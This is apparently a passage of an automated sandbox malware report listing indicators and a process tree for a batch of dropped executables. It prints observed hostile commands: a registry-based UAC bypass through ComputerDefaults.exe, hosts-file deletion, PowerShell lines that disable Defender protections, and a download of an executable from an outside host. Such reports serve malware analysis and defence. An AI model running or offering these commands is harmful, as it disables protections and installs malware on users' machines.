pid Process 3892 7zFM.exe 3892 7zFM.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4384 PerfWatson1.exe 3040 stail.exe 1672 stail.tmp 2372 lerryvideo.exe 3756 9758xBqgE1azKnB.exe 1324 PerfWatson1.exe 3628 filer.exe 1724 xxz.exe 4224 mspaint.exe 4224 mspaint.exe 4224 mspaint.exe 4224 mspaint.exe 3120 mspaint.exe 3120 mspaint.exe 3120 mspaint.exe 3120 mspaint.exe 7024 aspnet_regiis.exe 5252 PctOccurred.exe 5648 RegAsm.exe 3392 PharmaciesDetection.exe 7132 Restructuring.pif 5960 Buyer.pif 6844 Restructuring.pif 6508 pp.exe 1788 BitLockerToGo.exe 6224 av_downloader1.1.exe 6876 System.exe 3784 Synaptics.exe 7772 ConsiderableWinners.exe 7028 ._cache_System.exe 2348 v7wa24td.exe 7616 Possibly.pif 8148 Opdxdyeul.exe 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7084 EXCEL.EXE 7352 Possibly.pif 2476 Conhost.exe 6176 Conhost.exe 6212 Conhost.exe 1924 Conhost.exe 3884 Conhost.exe 8660 Conhost.exe 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE 3564 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4960 wrote to memory of 3828 4960 New Text Document mod.exe 107 PID 4960 wrote to memory of 3828 4960 New Text Document mod.exe 107 PID 3828 wrote to memory of 3628 3828 fHR9z2C.exe 108 PID 3828 wrote to memory of 3628 3828 fHR9z2C.exe 108 PID 3628 wrote to memory of 4636 3628 cmd.exe 110 PID 3628 wrote to memory of 4636 3628 cmd.exe 110 PID 3828 wrote to memory of 4692 3828 fHR9z2C.exe 111 PID 3828 wrote to memory of 4692 3828 fHR9z2C.exe 111 PID 4692 wrote to memory of 1748 4692 cmd.exe 113 PID 4692 wrote to memory of 1748 4692 cmd.exe 113 PID 4692 wrote to memory of 2640 4692 cmd.exe 114 PID 4692 wrote to memory of 2640 4692 cmd.exe 114 PID 3828 wrote to memory of 1936 3828 fHR9z2C.exe 115 PID 3828 wrote to memory of 1936 3828 fHR9z2C.exe 115 PID 1936 wrote to memory of 4360 1936 cmd.exe 117 PID 1936 wrote to memory of 4360 1936 cmd.exe 117 PID 4360 wrote to memory of 5080 4360 ComputerDefaults.exe 118 PID 4360 wrote to memory of 5080 4360 ComputerDefaults.exe 118 PID 5080 wrote to memory of 4904 5080 wscript.exe 119 PID 5080 wrote to memory of 4904 5080 wscript.exe 119 PID 3828 wrote to memory of 3840 3828 fHR9z2C.exe 121 PID 3828 wrote to memory of 3840 3828 fHR9z2C.exe 121 PID 3828 wrote to memory of 4660 3828 fHR9z2C.exe 123 PID 3828 wrote to memory of 4660 3828 fHR9z2C.exe 123 PID 4660 wrote to memory of 1508 4660 cmd.exe 125 PID 4660 wrote to memory of 1508 4660 cmd.exe 125 PID 3828 wrote to memory of 2492 3828 fHR9z2C.exe 126 PID 3828 wrote to memory of 2492 3828 fHR9z2C.exe 126 PID 2492 wrote to memory of 2612 2492 cmd.exe 128 PID 2492 wrote to memory of 2612 2492 cmd.exe 128 PID 3828 wrote to memory of 324 3828 fHR9z2C.exe 129 PID 3828 wrote to memory of 324 3828 fHR9z2C.exe 129 PID 324 wrote to memory of 1580 324 cmd.exe 131 PID 324 wrote to memory of 1580 324 cmd.exe 131 PID 324 wrote to memory of 1212 324 cmd.exe 132 PID 324 wrote to memory of 1212 324 cmd.exe 132 PID 3828 wrote to memory of 1296 3828 fHR9z2C.exe 133 PID 3828 wrote to memory of 1296 3828 fHR9z2C.exe 133 PID 1296 wrote to memory of 3244 1296 cmd.exe 135 PID 1296 wrote to memory of 3244 1296 cmd.exe 135 PID 3244 wrote to memory of 3632 3244 ComputerDefaults.exe 136 PID 3244 wrote to memory of 3632 3244 ComputerDefaults.exe 136 PID 3632 wrote to memory of 1288 3632 wscript.exe 137 PID 3632 wrote to memory of 1288 3632 wscript.exe 137 PID 3828 wrote to memory of 1372 3828 fHR9z2C.exe 139 PID 3828 wrote to memory of 1372 3828 fHR9z2C.exe 139 PID 3892 wrote to memory of 2484 3892 4363463463464363463463463.exe 141 PID 3892 wrote to memory of 2484 3892 4363463463464363463463463.exe 141 PID 3828 wrote to memory of 4576 3828 fHR9z2C.exe 142 PID 3828 wrote to memory of 4576 3828 fHR9z2C.exe 142 PID 4576 wrote to memory of 4664 4576 cmd.exe 145 PID 4576 wrote to memory of 4664 4576 cmd.exe 145 PID 2484 wrote to memory of 3636 2484 built.exe 146 PID 2484 wrote to memory of 3636 2484 built.exe 146 PID 2484 wrote to memory of 4384 2484 built.exe 148 PID 2484 wrote to memory of 4384 2484 built.exe 148 PID 4384 wrote to memory of 2640 4384 PerfWatson1.exe 149 PID 4384 wrote to memory of 2640 4384 PerfWatson1.exe 149 PID 3892 wrote to memory of 1432 3892 4363463463464363463463463.exe 151 PID 3892 wrote to memory of 1432 3892 4363463463464363463463463.exe 151 PID 3892 wrote to memory of 1432 3892 4363463463464363463463463.exe 151 PID 4384 wrote to memory of 3944 4384 PerfWatson1.exe 152 PID 4384 wrote to memory of 3944 4384 PerfWatson1.exe 152 PID 3944 wrote to memory of 3840 3944 cmd.exe 154 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 7092 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1068
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1300 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2340
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵PID:5396
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵PID:7960
-
-
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"2⤵
- Suspicious use of SetThreadContext
PID:5132 -
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4104
-
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵PID:8816
-
-
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6624 -
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"3⤵PID:1932
-
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵PID:4588
-
-
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"2⤵
- Suspicious use of SetThreadContext
PID:1920 -
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"3⤵PID:7540
-
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵PID:9780
-
-
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"2⤵
- Suspicious use of SetThreadContext
PID:8124 -
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"3⤵PID:3092
-
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵PID:6400
-
-
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"2⤵PID:5648
-
C:\ProgramData\euoxkxg\cqibun.exe"C:\ProgramData\euoxkxg\cqibun.exe"3⤵PID:11056
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1700
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2828
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"3⤵PID:7124
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"3⤵
- System Location Discovery: System Language Discovery
PID:7572
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2064
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2320
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
- Modifies data under HKEY_USERS
PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2792
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3212
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3220
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3564 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3892
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1680
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2456
-
-
C:\Users\Admin\Desktop\a\fHR9z2C.exe"C:\Users\Admin\Desktop\a\fHR9z2C.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4636
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1998.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1998.vbs" /f5⤵
- Modifies registry class
PID:1748
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:2640
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\1998.vbs6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:4904
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\1998.vbs4⤵PID:3840
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:1508
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2612
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8504.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8504.vbs" /f5⤵
- Modifies registry class
PID:1580
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:1212
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\8504.vbs6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1288
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\8504.vbs4⤵PID:1372
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4664
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3400
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3544
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4284.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4284.vbs" /f5⤵
- Modifies registry class
PID:2492
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3204
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:1808
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4268
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4284.vbs6⤵
- Checks computer location settings
PID:2020 -
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1440
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\4284.vbs4⤵PID:2548
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4492
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:2600
-
-
-
-
C:\Users\Admin\Desktop\a\filer.exe"C:\Users\Admin\Desktop\a\filer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Desktop\a\filer.exe4⤵
- Command and Scripting Interpreter: PowerShell
PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:1004
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption4⤵PID:4692
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name4⤵PID:560
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2600
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:772
-
-
-
C:\Users\Admin\Desktop\a\AmLzNi.exe"C:\Users\Admin\Desktop\a\AmLzNi.exe"3⤵
- Executes dropped EXE
PID:472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""4⤵
- Command and Scripting Interpreter: PowerShell
PID:392
-
-
-
C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"3⤵
- Executes dropped EXE
PID:4632
-
-
C:\Users\Admin\Desktop\a\XClient.exe"C:\Users\Admin\Desktop\a\XClient.exe"3⤵
- Executes dropped EXE
PID:652
-
-
C:\Users\Admin\Desktop\a\333.exe"C:\Users\Admin\Desktop\a\333.exe"3⤵
- Executes dropped EXE
PID:420
-
-
C:\Users\Admin\Desktop\a\VBVEd6f.exe"C:\Users\Admin\Desktop\a\VBVEd6f.exe"3⤵
- Executes dropped EXE
PID:2076
-
-
C:\Users\Admin\Desktop\a\test12.exe"C:\Users\Admin\Desktop\a\test12.exe"3⤵
- Executes dropped EXE
PID:1316
-
-
C:\Users\Admin\Desktop\a\test6.exe"C:\Users\Admin\Desktop\a\test6.exe"3⤵
- Executes dropped EXE
PID:2452
-
-
C:\Users\Admin\Desktop\a\test14.exe"C:\Users\Admin\Desktop\a\test14.exe"3⤵
- Executes dropped EXE
PID:3936
-
-
C:\Users\Admin\Desktop\a\pantest.exe"C:\Users\Admin\Desktop\a\pantest.exe"3⤵
- Executes dropped EXE
PID:680
-
-
C:\Users\Admin\Desktop\a\test9.exe"C:\Users\Admin\Desktop\a\test9.exe"3⤵
- Executes dropped EXE
PID:1324
-
-
C:\Users\Admin\Desktop\a\test10-29.exe"C:\Users\Admin\Desktop\a\test10-29.exe"3⤵
- Executes dropped EXE
PID:188
-
-
C:\Users\Admin\Desktop\a\test19.exe"C:\Users\Admin\Desktop\a\test19.exe"3⤵
- Executes dropped EXE
PID:556
-
-
C:\Users\Admin\Desktop\a\test10.exe"C:\Users\Admin\Desktop\a\test10.exe"3⤵
- Executes dropped EXE
PID:1092
-
-
C:\Users\Admin\Desktop\a\test_again4.exe"C:\Users\Admin\Desktop\a\test_again4.exe"3⤵
- Executes dropped EXE
PID:992
-
-
C:\Users\Admin\Desktop\a\test23.exe"C:\Users\Admin\Desktop\a\test23.exe"3⤵
- Executes dropped EXE
PID:2652
-
-
C:\Users\Admin\Desktop\a\test5.exe"C:\Users\Admin\Desktop\a\test5.exe"3⤵
- Executes dropped EXE
PID:1580
-
-
C:\Users\Admin\Desktop\a\test11.exe"C:\Users\Admin\Desktop\a\test11.exe"3⤵
- Executes dropped EXE
PID:2052
-
-
C:\Users\Admin\Desktop\a\test20.exe"C:\Users\Admin\Desktop\a\test20.exe"3⤵
- Executes dropped EXE
PID:1968
-
-
C:\Users\Admin\Desktop\a\test_again3.exe"C:\Users\Admin\Desktop\a\test_again3.exe"3⤵
- Executes dropped EXE
PID:1816
-
-
C:\Users\Admin\Desktop\a\test16.exe"C:\Users\Admin\Desktop\a\test16.exe"3⤵
- Executes dropped EXE
PID:5164
-
-
C:\Users\Admin\Desktop\a\test13.exe"C:\Users\Admin\Desktop\a\test13.exe"3⤵
- Executes dropped EXE
PID:5260
-
-
C:\Users\Admin\Desktop\a\test_again2.exe"C:\Users\Admin\Desktop\a\test_again2.exe"3⤵
- Executes dropped EXE
PID:5368
-
-
C:\Users\Admin\Desktop\a\test15.exe"C:\Users\Admin\Desktop\a\test15.exe"3⤵
- Executes dropped EXE
PID:5468
-
-
C:\Users\Admin\Desktop\a\test18.exe"C:\Users\Admin\Desktop\a\test18.exe"3⤵
- Executes dropped EXE
PID:5568
-
-
